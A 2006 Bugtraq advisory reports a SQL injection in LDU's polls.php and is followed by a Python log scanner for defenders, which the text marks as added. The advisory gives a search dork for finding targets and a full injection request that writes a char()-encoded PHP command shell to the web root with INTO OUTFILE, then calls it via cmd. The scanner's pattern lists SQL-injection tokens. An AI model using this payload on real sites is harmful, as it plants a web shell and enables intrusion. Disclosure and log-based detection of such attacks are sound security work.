| To: | bugtraq@securityfocus.com |
|---|---|
| Subject: | LDU <= 8.x (polls.php) Remote SQL Injection Vulnerability |
| From: | ajannhwt@hotmail.com |
| Date: | 30 Nov 2006 15:36:57 -0000 |

*******************************************************************************
# Title : LDU <= 8.x (polls.php) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# Dork : "Powered by LDU"
*******************************************************************************

[[SQL]]]------------------------------------------------------

### http://[target]/[path]/polls.php?id=

Example:

// polls.php?id='union%20select%200,0,0,0,char(60,63,105,110,99,108,117,100,101,40,36,99,109,100,41,59,63,62)%20from%20sed_users%20INTO%20OUTFILE%20'[path]/.php'/*

.php?cmd=[shell]

"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
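For defenders reviewing web server logs for the request pattern reported above, the following is an added example and not part of the original post: it flags `polls.php` requests whose `id` parameter is not a plain integer and marks those carrying SQL fragments. The log lines are constructed, and the rule that legitimate poll ids are numeric is an assumption.

```python
import re
from urllib.parse import parse_qs

# Constructed access-log lines (not from the original post); documentation address ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [30/Nov/2006:15:40:01 +0000] "GET /ldu/polls.php?id=12 HTTP/1.1" 200 5120
198.51.100.9 - - [30/Nov/2006:15:41:13 +0000] "GET /ldu/polls.php?id='union%20select%200,0,0,0,char(60,63)%20from%20sed_users%20INTO%20OUTFILE%20'[path]/.php'/* HTTP/1.1" 200 312
198.51.100.9 - - [30/Nov/2006:15:42:40 +0000] "GET /ldu/polls.php?id=abc HTTP/1.1" 200 2048
203.0.113.4 - - [30/Nov/2006:15:43:02 +0000] "GET /ldu/index.php?id=3 HTTP/1.1" 200 900
"""

# Client address and request target from a common/combined-format log entry.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# SQL fragments of the kind shown in the advisory's example request.
SQL_TOKENS = re.compile(r"union\s+select|into\s+(?:out|dump)file|char\s*\(|/\*|'", re.I)


def classify(line):
    """Return (client, verdict, decoded id) for a suspicious polls.php request, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target = m.groups()
    path, _, query = target.partition("?")
    if not path.lower().endswith("/polls.php"):
        return None
    # parse_qs URL-decodes the value, so %20 and similar encodings are normalised first.
    for value in parse_qs(query, keep_blank_values=True).get("id", []):
        if re.fullmatch(r"[0-9]+", value):  # assumption: legitimate poll ids are numeric
            continue
        verdict = "sqli" if SQL_TOKENS.search(value) else "non-numeric"
        return client, verdict, value
    return None


def scan(log_text):
    """Classify every line of a log and keep only the suspicious requests."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for client, verdict, value in scan(SAMPLE_LOG):
        print(f"{client}\t{verdict}\t{value}")
```

A hit containing `INTO OUTFILE` is a reason to check the web root for `.php` files the application did not ship.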